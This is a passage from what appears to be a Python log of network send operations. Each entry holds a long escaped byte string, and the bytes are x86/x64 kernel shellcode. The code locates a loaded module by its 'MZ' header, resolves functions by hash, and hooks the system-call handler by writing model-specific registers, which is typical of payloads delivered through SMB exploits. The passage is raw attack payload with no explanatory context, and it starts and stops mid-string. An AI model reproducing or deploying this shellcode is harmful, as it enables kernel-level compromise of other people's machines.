E,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 14, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x